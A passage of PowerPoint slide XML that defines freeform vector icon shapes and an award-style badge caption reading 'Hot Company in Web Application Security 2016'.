                    <a:gd name="T5" fmla="*/ 52 h 239"/>
                    <a:gd name="T6" fmla="*/ 0 w 179"/>
                    <a:gd name="T7" fmla="*/ 185 h 239"/>
                    <a:gd name="T8" fmla="*/ 62 w 179"/>
                    <a:gd name="T9" fmla="*/ 239 h 239"/>
                    <a:gd name="T10" fmla="*/ 110 w 179"/>
                    <a:gd name="T11" fmla="*/ 193 h 239"/>
                    <a:gd name="T12" fmla="*/ 110 w 179"/>
                    <a:gd name="T13" fmla="*/ 169 h 239"/>
                    <a:gd name="T14" fmla="*/ 179 w 179"/>
                    <a:gd name="T15" fmla="*/ 169 h 239"/>
                    <a:gd name="T16" fmla="*/ 179 w 179"/>
                    <a:gd name="T17" fmla="*/ 70 h 239"/>
                    <a:gd name="T18" fmla="*/ 110 w 179"/>
                    <a:gd name="T19" fmla="*/ 70 h 239"/>
                    <a:gd name="T20" fmla="*/ 111 w 179"/>
                    <a:gd name="T21" fmla="*/ 37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79" h="239">
                      <a:moveTo>
                        <a:pt x="111" y="37"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="111" y="37"/>
                        <a:pt x="106" y="0"/>
                        <a:pt x="56" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="0" y="37"/>
                        <a:pt x="0" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="67"/>
                        <a:pt x="0" y="164"/>
                        <a:pt x="0" y="185"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="207"/>
                        <a:pt x="12" y="239"/>
                        <a:pt x="62" y="239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="112" y="239"/>
                        <a:pt x="110" y="193"/>
                        <a:pt x="110" y="193"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="169"/>
                        <a:pt x="110" y="169"/>
                        <a:pt x="110" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="169"/>
                        <a:pt x="179" y="169"/>
                        <a:pt x="179" y="169"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="70"/>
                        <a:pt x="179" y="70"/>
                        <a:pt x="179" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="70"/>
                        <a:pt x="110" y="70"/>
                        <a:pt x="110" y="70"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="111" y="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27" name="Freeform 79">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{277F1F7B-9916-B24F-BA23-7C3AE26F0D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17224" y="18557899"/>
                  <a:ext cx="752475" cy="741363"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 124 w 178"/>
                    <a:gd name="T1" fmla="*/ 175 h 175"/>
                    <a:gd name="T2" fmla="*/ 176 w 178"/>
                    <a:gd name="T3" fmla="*/ 136 h 175"/>
                    <a:gd name="T4" fmla="*/ 85 w 178"/>
                    <a:gd name="T5" fmla="*/ 74 h 175"/>
                    <a:gd name="T6" fmla="*/ 0 w 178"/>
                    <a:gd name="T7" fmla="*/ 0 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 178"/>
                    <a:gd name="T9" fmla="*/ 114 h 175"/>
                    <a:gd name="T10" fmla="*/ 66 w 178"/>
                    <a:gd name="T11" fmla="*/ 114 h 175"/>
                    <a:gd name="T12" fmla="*/ 124 w 178"/>
                    <a:gd name="T13" fmla="*/ 175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8" h="175">
                      <a:moveTo>
                        <a:pt x="124" y="175"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="166" y="175"/>
                        <a:pt x="175" y="154"/>
                        <a:pt x="176" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="119"/>
                        <a:pt x="172" y="105"/>
                        <a:pt x="85" y="74"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="53"/>
                        <a:pt x="6" y="19"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="114"/>
                        <a:pt x="0" y="114"/>
                        <a:pt x="0" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="114"/>
                        <a:pt x="66" y="114"/>
                        <a:pt x="66" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="151"/>
                        <a:pt x="81" y="175"/>
                        <a:pt x="124" y="1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28" name="Freeform 80">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC1CA0A-67FD-F643-B534-2E6E62B516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265087" y="18010211"/>
                  <a:ext cx="368300" cy="242888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 87"/>
                    <a:gd name="T1" fmla="*/ 0 h 57"/>
                    <a:gd name="T2" fmla="*/ 87 w 87"/>
                    <a:gd name="T3" fmla="*/ 57 h 57"/>
                    <a:gd name="T4" fmla="*/ 87 w 87"/>
                    <a:gd name="T5" fmla="*/ 0 h 57"/>
                    <a:gd name="T6" fmla="*/ 0 w 87"/>
                    <a:gd name="T7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7" h="57">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="8"/>
                        <a:pt x="80" y="36"/>
                        <a:pt x="87" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="0"/>
                        <a:pt x="87" y="0"/>
                        <a:pt x="8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29" name="Freeform 81">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23EFEE19-FEC7-8E45-926F-0F2930C8CB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317224" y="18010211"/>
                  <a:ext cx="388938" cy="314325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 92 w 92"/>
                    <a:gd name="T1" fmla="*/ 0 h 74"/>
                    <a:gd name="T2" fmla="*/ 0 w 92"/>
                    <a:gd name="T3" fmla="*/ 0 h 74"/>
                    <a:gd name="T4" fmla="*/ 0 w 92"/>
                    <a:gd name="T5" fmla="*/ 74 h 74"/>
                    <a:gd name="T6" fmla="*/ 92 w 92"/>
                    <a:gd name="T7" fmla="*/ 0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74">
                      <a:moveTo>
                        <a:pt x="9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7" y="45"/>
                        <a:pt x="30" y="9"/>
                        <a:pt x="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</p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="230" name="Group 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F303253A-1842-1A44-8EFC-395601E3B772}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2433876" y="5642189"/>
              <a:ext cx="669969" cy="737988"/>
              <a:chOff x="6499743" y="5642189"/>
              <a:chExt cx="669969" cy="737988"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="231" name="Shape 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23269358-81B5-3949-8358-04D2FE51B2DD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6499743" y="6103178"/>
                <a:ext cx="66996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algn="ctr"/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Hot</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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Company </a:t>
                </a:r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in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Web</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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Application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</a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/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Security</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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en-US" altLang="ko-KR" sz="599" dirty="0" err="1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for</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US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 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="599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ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                    <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:sym typeface="Arial"/>
                  </a:rPr>
                  <a:t>2016</a:t>
                </a:r>
                <a:endParaRPr sz="599"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ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="232" name="그룹 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCA4187B-75E5-6246-B6C9-D2FE5440E444}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6639431" y="5642189"/>
                <a:ext cx="390550" cy="354522"/>
                <a:chOff x="17084612" y="17824474"/>
                <a:chExt cx="2478088" cy="2249488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33" name="Freeform 82">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E737BC2C-250F-9542-8808-ECE5F6AF89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43412" y="18595999"/>
                  <a:ext cx="398463" cy="444500"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 49 w 94"/>
                    <a:gd name="T1" fmla="*/ 87 h 105"/>
                    <a:gd name="T2" fmla="*/ 22 w 94"/>
                    <a:gd name="T3" fmla="*/ 53 h 105"/>
                    <a:gd name="T4" fmla="*/ 49 w 94"/>
                    <a:gd name="T5" fmla="*/ 19 h 105"/>
                    <a:gd name="T6" fmla="*/ 71 w 94"/>
                    <a:gd name="T7" fmla="*/ 36 h 105"/>
                    <a:gd name="T8" fmla="*/ 93 w 94"/>
                    <a:gd name="T9" fmla="*/ 36 h 105"/>
                    <a:gd name="T10" fmla="*/ 49 w 94"/>
                    <a:gd name="T11" fmla="*/ 0 h 105"/>
                    <a:gd name="T12" fmla="*/ 0 w 94"/>
                    <a:gd name="T13" fmla="*/ 53 h 105"/>
                    <a:gd name="T14" fmla="*/ 49 w 94"/>
                    <a:gd name="T15" fmla="*/ 105 h 105"/>
                    <a:gd name="T16" fmla="*/ 94 w 94"/>
                    <a:gd name="T17" fmla="*/ 64 h 105"/>
                    <a:gd name="T18" fmla="*/ 72 w 94"/>
                    <a:gd name="T19" fmla="*/ 64 h 105"/>
                    <a:gd name="T20" fmla="*/ 49 w 94"/>
                    <a:gd name="T21" fmla="*/ 87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94" h="105">
                      <a:moveTo>
                        <a:pt x="49" y="87"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="87"/>
                        <a:pt x="22" y="70"/>
                        <a:pt x="22" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="36"/>
                        <a:pt x="30" y="19"/>
                        <a:pt x="49" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="19"/>
                        <a:pt x="70" y="26"/>
                        <a:pt x="71" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="93" y="36"/>
                        <a:pt x="93" y="36"/>
                        <a:pt x="93" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="13"/>
                        <a:pt x="71" y="0"/>
                        <a:pt x="49" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="0"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="0" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="82"/>
                        <a:pt x="18" y="105"/>
                        <a:pt x="49" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="105"/>
                        <a:pt x="91" y="89"/>
                        <a:pt x="94" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="64"/>
                        <a:pt x="72" y="64"/>
                        <a:pt x="72" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="78"/>
                        <a:pt x="63" y="87"/>
                        <a:pt x="49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34" name="Freeform 83">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B34F5BDE-CF61-3841-B717-70917633844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8105374" y="18608699"/>
                  <a:ext cx="377825" cy="423863"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 89"/>
                    <a:gd name="T1" fmla="*/ 49 h 100"/>
                    <a:gd name="T2" fmla="*/ 43 w 89"/>
                    <a:gd name="T3" fmla="*/ 0 h 100"/>
                    <a:gd name="T4" fmla="*/ 0 w 89"/>
                    <a:gd name="T5" fmla="*/ 0 h 100"/>
                    <a:gd name="T6" fmla="*/ 0 w 89"/>
                    <a:gd name="T7" fmla="*/ 100 h 100"/>
                    <a:gd name="T8" fmla="*/ 43 w 89"/>
                    <a:gd name="T9" fmla="*/ 100 h 100"/>
                    <a:gd name="T10" fmla="*/ 89 w 89"/>
                    <a:gd name="T11" fmla="*/ 49 h 100"/>
                    <a:gd name="T12" fmla="*/ 41 w 89"/>
                    <a:gd name="T13" fmla="*/ 81 h 100"/>
                    <a:gd name="T14" fmla="*/ 22 w 89"/>
                    <a:gd name="T15" fmla="*/ 81 h 100"/>
                    <a:gd name="T16" fmla="*/ 22 w 89"/>
                    <a:gd name="T17" fmla="*/ 18 h 100"/>
                    <a:gd name="T18" fmla="*/ 37 w 89"/>
                    <a:gd name="T19" fmla="*/ 18 h 100"/>
                    <a:gd name="T20" fmla="*/ 66 w 89"/>
                    <a:gd name="T21" fmla="*/ 51 h 100"/>
                    <a:gd name="T22" fmla="*/ 41 w 89"/>
                    <a:gd name="T23" fmla="*/ 81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100">
                      <a:moveTo>
                        <a:pt x="89" y="49"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="16"/>
                        <a:pt x="69" y="0"/>
                        <a:pt x="4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43" y="100"/>
                        <a:pt x="43" y="100"/>
                        <a:pt x="43" y="100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="100"/>
                        <a:pt x="89" y="78"/>
                        <a:pt x="89" y="49"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="41" y="81"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="81"/>
                        <a:pt x="22" y="81"/>
                        <a:pt x="22" y="81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37" y="18"/>
                        <a:pt x="37" y="18"/>
                        <a:pt x="37" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="18"/>
                        <a:pt x="66" y="31"/>
                        <a:pt x="66" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="74"/>
                        <a:pt x="54" y="81"/>
                        <a:pt x="41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35" name="Freeform 84">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06440773-939F-3D4F-9D30-DB0FDFC9E1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46699" y="18608699"/>
                  <a:ext cx="457200" cy="423863"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 56 w 288"/>
                    <a:gd name="T1" fmla="*/ 77 h 267"/>
                    <a:gd name="T2" fmla="*/ 56 w 288"/>
                    <a:gd name="T3" fmla="*/ 77 h 267"/>
                    <a:gd name="T4" fmla="*/ 120 w 288"/>
                    <a:gd name="T5" fmla="*/ 267 h 267"/>
                    <a:gd name="T6" fmla="*/ 165 w 288"/>
                    <a:gd name="T7" fmla="*/ 267 h 267"/>
                    <a:gd name="T8" fmla="*/ 232 w 288"/>
                    <a:gd name="T9" fmla="*/ 77 h 267"/>
                    <a:gd name="T10" fmla="*/ 232 w 288"/>
                    <a:gd name="T11" fmla="*/ 77 h 267"/>
                    <a:gd name="T12" fmla="*/ 232 w 288"/>
                    <a:gd name="T13" fmla="*/ 267 h 267"/>
                    <a:gd name="T14" fmla="*/ 288 w 288"/>
                    <a:gd name="T15" fmla="*/ 267 h 267"/>
                    <a:gd name="T16" fmla="*/ 288 w 288"/>
                    <a:gd name="T17" fmla="*/ 0 h 267"/>
                    <a:gd name="T18" fmla="*/ 205 w 288"/>
                    <a:gd name="T19" fmla="*/ 0 h 267"/>
                    <a:gd name="T20" fmla="*/ 146 w 288"/>
                    <a:gd name="T21" fmla="*/ 184 h 267"/>
                    <a:gd name="T22" fmla="*/ 144 w 288"/>
                    <a:gd name="T23" fmla="*/ 184 h 267"/>
                    <a:gd name="T24" fmla="*/ 82 w 288"/>
                    <a:gd name="T25" fmla="*/ 0 h 267"/>
                    <a:gd name="T26" fmla="*/ 0 w 288"/>
                    <a:gd name="T27" fmla="*/ 0 h 267"/>
                    <a:gd name="T28" fmla="*/ 0 w 288"/>
                    <a:gd name="T29" fmla="*/ 267 h 267"/>
                    <a:gd name="T30" fmla="*/ 56 w 288"/>
                    <a:gd name="T31" fmla="*/ 267 h 267"/>
                    <a:gd name="T32" fmla="*/ 56 w 288"/>
                    <a:gd name="T33" fmla="*/ 7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8" h="267">
                      <a:moveTo>
                        <a:pt x="56" y="77"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="56" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="120" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="165" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="232" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="232" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="232" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="288" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="205" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="146" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="144" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="82" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56" y="7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/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="236" name="Freeform 85">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EBD6AFE-5D81-B840-8A41-7E999E4620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7084612" y="17824474"/>
                  <a:ext cx="2478088" cy="2249488"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 585 w 585"/>
                    <a:gd name="T1" fmla="*/ 417 h 531"/>
                    <a:gd name="T2" fmla="*/ 542 w 585"/>
                    <a:gd name="T3" fmla="*/ 417 h 531"/>
                    <a:gd name="T4" fmla="*/ 542 w 585"/>
                    <a:gd name="T5" fmla="*/ 395 h 531"/>
                    <a:gd name="T6" fmla="*/ 489 w 585"/>
                    <a:gd name="T7" fmla="*/ 395 h 531"/>
                    <a:gd name="T8" fmla="*/ 492 w 585"/>
                    <a:gd name="T9" fmla="*/ 382 h 531"/>
                    <a:gd name="T10" fmla="*/ 469 w 585"/>
                    <a:gd name="T11" fmla="*/ 376 h 531"/>
                    <a:gd name="T12" fmla="*/ 478 w 585"/>
                    <a:gd name="T13" fmla="*/ 342 h 531"/>
                    <a:gd name="T14" fmla="*/ 491 w 585"/>
                    <a:gd name="T15" fmla="*/ 0 h 531"/>
                    <a:gd name="T16" fmla="*/ 293 w 585"/>
                    <a:gd name="T17" fmla="*/ 2 h 531"/>
                    <a:gd name="T18" fmla="*/ 293 w 585"/>
                    <a:gd name="T19" fmla="*/ 2 h 531"/>
                    <a:gd name="T20" fmla="*/ 95 w 585"/>
                    <a:gd name="T21" fmla="*/ 0 h 531"/>
                    <a:gd name="T22" fmla="*/ 108 w 585"/>
                    <a:gd name="T23" fmla="*/ 342 h 531"/>
                    <a:gd name="T24" fmla="*/ 117 w 585"/>
                    <a:gd name="T25" fmla="*/ 375 h 531"/>
                    <a:gd name="T26" fmla="*/ 91 w 585"/>
                    <a:gd name="T27" fmla="*/ 382 h 531"/>
                    <a:gd name="T28" fmla="*/ 94 w 585"/>
                    <a:gd name="T29" fmla="*/ 395 h 531"/>
                    <a:gd name="T30" fmla="*/ 43 w 585"/>
                    <a:gd name="T31" fmla="*/ 395 h 531"/>
                    <a:gd name="T32" fmla="*/ 43 w 585"/>
                    <a:gd name="T33" fmla="*/ 417 h 531"/>
                    <a:gd name="T34" fmla="*/ 0 w 585"/>
                    <a:gd name="T35" fmla="*/ 417 h 531"/>
                    <a:gd name="T36" fmla="*/ 16 w 585"/>
                    <a:gd name="T37" fmla="*/ 448 h 531"/>
                    <a:gd name="T38" fmla="*/ 0 w 585"/>
                    <a:gd name="T39" fmla="*/ 479 h 531"/>
                    <a:gd name="T40" fmla="*/ 103 w 585"/>
                    <a:gd name="T41" fmla="*/ 479 h 531"/>
                    <a:gd name="T42" fmla="*/ 103 w 585"/>
                    <a:gd name="T43" fmla="*/ 457 h 531"/>
                    <a:gd name="T44" fmla="*/ 172 w 585"/>
                    <a:gd name="T45" fmla="*/ 457 h 531"/>
                    <a:gd name="T46" fmla="*/ 293 w 585"/>
                    <a:gd name="T47" fmla="*/ 531 h 531"/>
                    <a:gd name="T48" fmla="*/ 414 w 585"/>
                    <a:gd name="T49" fmla="*/ 457 h 531"/>
                    <a:gd name="T50" fmla="*/ 482 w 585"/>
                    <a:gd name="T51" fmla="*/ 457 h 531"/>
                    <a:gd name="T52" fmla="*/ 482 w 585"/>
                    <a:gd name="T53" fmla="*/ 479 h 531"/>
                    <a:gd name="T54" fmla="*/ 585 w 585"/>
                    <a:gd name="T55" fmla="*/ 479 h 531"/>
                    <a:gd name="T56" fmla="*/ 569 w 585"/>
                    <a:gd name="T57" fmla="*/ 448 h 531"/>
                    <a:gd name="T58" fmla="*/ 585 w 585"/>
                    <a:gd name="T59" fmla="*/ 417 h 531"/>
                    <a:gd name="T60" fmla="*/ 121 w 585"/>
                    <a:gd name="T61" fmla="*/ 335 h 531"/>
                    <a:gd name="T62" fmla="*/ 108 w 585"/>
                    <a:gd name="T63" fmla="*/ 20 h 531"/>
                    <a:gd name="T64" fmla="*/ 293 w 585"/>
                    <a:gd name="T65" fmla="*/ 21 h 531"/>
                    <a:gd name="T66" fmla="*/ 293 w 585"/>
                    <a:gd name="T67" fmla="*/ 21 h 531"/>
                    <a:gd name="T68" fmla="*/ 477 w 585"/>
                    <a:gd name="T69" fmla="*/ 20 h 531"/>
                    <a:gd name="T70" fmla="*/ 464 w 585"/>
                    <a:gd name="T71" fmla="*/ 335 h 531"/>
                    <a:gd name="T72" fmla="*/ 454 w 585"/>
                    <a:gd name="T73" fmla="*/ 372 h 531"/>
                    <a:gd name="T74" fmla="*/ 131 w 585"/>
                    <a:gd name="T75" fmla="*/ 372 h 531"/>
                    <a:gd name="T76" fmla="*/ 121 w 585"/>
                    <a:gd name="T77" fmla="*/ 335 h 531"/>
                    <a:gd name="T78" fmla="*/ 293 w 585"/>
                    <a:gd name="T79" fmla="*/ 511 h 531"/>
                    <a:gd name="T80" fmla="*/ 171 w 585"/>
                    <a:gd name="T81" fmla="*/ 432 h 531"/>
                    <a:gd name="T82" fmla="*/ 223 w 585"/>
                    <a:gd name="T83" fmla="*/ 421 h 531"/>
                    <a:gd name="T84" fmla="*/ 359 w 585"/>
                    <a:gd name="T85" fmla="*/ 421 h 531"/>
                    <a:gd name="T86" fmla="*/ 413 w 585"/>
                    <a:gd name="T87" fmla="*/ 434 h 531"/>
                    <a:gd name="T88" fmla="*/ 293 w 585"/>
                    <a:gd name="T89" fmla="*/ 511 h 5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85" h="531">
                      <a:moveTo>
                        <a:pt x="585" y="417"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="542" y="417"/>
                        <a:pt x="542" y="417"/>
                        <a:pt x="542" y="417"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="542" y="395"/>
                        <a:pt x="542" y="395"/>
                        <a:pt x="542" y="395"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="489" y="395"/>
                        <a:pt x="489" y="395"/>
                        <a:pt x="489" y="395"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="490" y="391"/>
                        <a:pt x="491" y="387"/>
                        <a:pt x="492" y="382"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="484" y="380"/>
                        <a:pt x="476" y="378"/>
                        <a:pt x="469" y="376"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="473" y="365"/>
                        <a:pt x="476" y="354"/>
                        <a:pt x="478" y="342"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="502" y="205"/>
                        <a:pt x="491" y="0"/>
                        <a:pt x="491" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="491" y="0"/>
                        <a:pt x="411" y="46"/>
                        <a:pt x="293" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="293" y="2"/>
                        <a:pt x="293" y="2"/>
                        <a:pt x="293" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="175" y="46"/>
                        <a:pt x="95" y="0"/>
                        <a:pt x="95" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="0"/>
                        <a:pt x="84" y="205"/>
                        <a:pt x="108" y="342"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="353"/>
                        <a:pt x="113" y="365"/>
                        <a:pt x="117" y="375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="377"/>
                        <a:pt x="100" y="380"/>
                        <a:pt x="91" y="382"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="387"/>
                        <a:pt x="93" y="391"/>
                        <a:pt x="94" y="395"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="395"/>
                        <a:pt x="43" y="395"/>
                        <a:pt x="43" y="395"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="417"/>
                        <a:pt x="43" y="417"/>
                        <a:pt x="43" y="417"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="417"/>
                        <a:pt x="0" y="417"/>
                        <a:pt x="0" y="417"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="448"/>
                        <a:pt x="16" y="448"/>
                        <a:pt x="16" y="448"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="479"/>
                        <a:pt x="0" y="479"/>
                        <a:pt x="0" y="479"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="479"/>
                        <a:pt x="103" y="479"/>
                        <a:pt x="103" y="479"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="457"/>
                        <a:pt x="103" y="457"/>
                        <a:pt x="103" y="457"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="172" y="457"/>
                        <a:pt x="172" y="457"/>
                        <a:pt x="172" y="457"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
